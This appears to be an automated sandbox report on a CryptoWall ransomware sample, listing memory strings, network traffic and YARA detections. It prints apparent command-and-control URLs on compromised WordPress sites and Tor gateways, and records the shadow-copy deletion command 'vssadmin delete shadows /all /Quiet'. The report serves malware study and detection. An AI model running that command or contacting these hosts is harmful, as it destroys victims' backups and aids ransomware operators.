Source: svcmtr.exe, 00000002.00000003.753072751.0000000003733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/docs/siteowner.aspx.
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A
Source: svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shmetterheath.ru/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tartarus.org/~martin/PorterStemmer
Source: svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://teenpornotube.org/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C91884649
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc1950
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upx.sourceforge.net/upx-license.html.
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upx.tsx.org
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
Source: svcmtr.exe, 00000002.00000003.753072751.0000000003733000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
Source: svcmtr.exe, 00000002.00000003.753072751.0000000003733000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/memento/codeofconduct.htm
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.linuxnet.com
Source: svcmtr.exe, 00000002.00000003.753123088.0000000003791000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.753072751.0000000003790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2004/em-rdf#
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nexus.hu/upx
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sgi.com/software/opensource/cid/license.html
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sgi.com/software/opensource/glx/license.html.
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.teenpornotube.org/wp-content/themes/r.php
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.teenpornotube.org/wp-content/themes/r.phpa
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.teenpornotube.org/wp-content/themes/r.phpp
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmp, notepad.exe, 00000015.00000002.875324829.000000000017E000.00000004.00000020.00020000.00000000.sdmp, restore_files_gpmus.txt48.2.dr, restore_files_gpmus.txt112.2.dr, restore_files_gpmus.txt293.2.dr, restore_files_gpmus.txt119.2.dr, restore_files_gpmus.txt382.2.dr, restore_files_gpmus.txt411.2.dr, restore_files_gpmus.txt327.2.dr, restore_files_gpmus.txt376.2.dr, restore_files_gpmus.txt155.2.drString found in binary or memory: http://www.torproject.org/projects/torbrowser.html.en
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/Public/
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/Public/.
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/cldr/data/.
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/copyright.html.
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/reports/
Source: svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xfree86.org/)
Source: svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
Source: svcmtr.exe, 00000002.00000003.422925708.00000000039A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com/js/client.js
Source: svcmtr.exe, 00000002.00000003.422925708.00000000039A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://castedumessaging-pa.googleapis.com/v1
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.454213714.0000000003751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients6.google.com
Source: svcmtr.exe, 00000002.00000003.454213714.0000000003751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash.corp.google.com/samples?reportid=&q=
Source: svcmtr.exe, 00000002.00000003.402410787.00000000006FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/.
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/publicdomain/zero/1.0/.
Source: svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/SDK/High-Level_APIs/simple-storage
Source: svcmtr.exe, 00000002.00000003.526806159.00000000006D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/SDK/Tutorials/Creating_event_targets
Source: svcmtr.exe, 00000002.00000003.422925708.00000000039A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com
Source: svcmtr.exe, 00000002.00000003.408228286.00000000038A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/angular/material
Source: svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.407092366.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hangouts.clients6.google.com
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hangouts.google.com/hangouts/_/logpref
Source: svcmtr.exe, 00000002.00000003.422925708.00000000039A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://meet.google.com
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://meetings.clients6.google.com
Source: svcmtr.exe, 00000002.00000003.422925708.00000000039A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://networktraversal.googleapis.com/v1alpha
Source: svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://preprod-hangouts-googleapis.sandbox.google.com
Source: svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: svcmtr.exe, 00000002.00000002.875689270.00000000006AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://serenitynowbooksandgifts.com/
Source: svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496
Source: svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.407092366.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/cleardot.gif
Source: svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/dot2.gif
Source: svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/x2.gif
Source: svcmtr.exe, 00000002.00000003.407092366.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: svcmtr.exe, 00000002.00000003.415718725.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback
Source: svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.407092366.0000000002980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com
Source: svcmtr.exe, 00000002.00000003.422925708.00000000039A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/calendar/v3
Source: svcmtr.exe, 00000002.00000003.422925708.00000000039A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/hangouts/v1
Source: svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.serenitynowbooksandgifts.com/
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/Bm
Source: svcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp, notepad.exe, 00000015.00000002.875324829.000000000017E000.00000004.00000020.00020000.00000000.sdmp, restore_files_gpmus.txt48.2.dr, restore_files_gpmus.txt112.2.dr, restore_files_gpmus.txt293.2.dr, restore_files_gpmus.txt119.2.dr, restore_files_gpmus.txt382.2.dr, restore_files_gpmus.txt411.2.dr, restore_files_gpmus.txt327.2.dr, restore_files_gpmus.txt376.2.dr, restore_files_gpmus.txt155.2.dr, restore_files_gpmus.txt379.2.dr, restore_files_gpmus.txt404.2.dr, restore_files_gpmus.txt303.2.dr, restore_files_gpmus.txt133.2.dr, restore_files_gpmus.txt146.2.dr, restore_files_gpmus.txt174.2.dr, restore_files_gpmus.txt292.2.dr, restore_files_gpmus.txt181.2.dr, restore_files_gpmus.txt402.2.dr, restore_files_gpmus.txt397.2.drString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: svcmtr.exe, 00000002.00000003.762757058.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.755159581.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.767533797.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.671880034.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.766203672.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.761900567.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.772593472.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.763661219.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.660754432.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.765866382.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.764581660.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.763893449.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.771267902.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.660454927.0000000003733000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.765633512.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.762361432.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.770304239.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.466108647.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.773528671.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD977
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.tor2web.org
Source: svcmtr.exe, 00000002.00000003.757693083.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.744684272.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.746044261.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.754261964.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.527014764.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.659748540.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.422925708.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516382548.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.tor2web.org/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
Source: unknownHTTPS traffic detected: 185.230.63.171:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.22:49167 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Yara detected CryptoWall ransomware
Source: Yara matchFile source: Process Memory Space: 0t8amSU3vd.exe PID: 3452, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: svcmtr.exe PID: 3504, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: svcmtr.exe PID: 3892, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: svcmtr.exe PID: 3948, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: svcmtr.exe PID: 4000, type: MEMORYSTR
Yara detected TrojanRansom
Source: Yara matchFile source: Process Memory Space: svcmtr.exe PID: 3504, type: MEMORYSTR
Deletes shadow drive data (may be related to ransomware)
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet Jump to behavior
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
